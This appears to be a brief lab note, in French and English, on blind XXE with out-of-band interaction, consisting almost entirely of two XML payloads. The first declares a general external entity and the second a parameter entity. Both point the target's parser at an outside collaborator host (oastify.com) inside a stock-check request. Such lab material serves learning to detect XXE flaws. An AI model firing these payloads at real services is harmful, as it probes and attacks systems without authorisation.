XXE aveugle - entités de paramètres XML (OOB)
Blind XXE with out-of-band interaction via XML parameter entities


Mis à jour


Mis à jour
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY myFile SYSTEM "https://h4m66g65x80x7bwj3ueflms990fr3hr6.oastify.com">]>
<stockCheck>
<productId>
&myFile;
</productId>
<storeId>
1
</storeId>
</stockCheck><!DOCTYPE foo [<!ENTITY % myFile SYSTEM "https://s70h9r9g0j38amzu65hqoxvkcbi36vuk.oastify.com"> %myFile;]>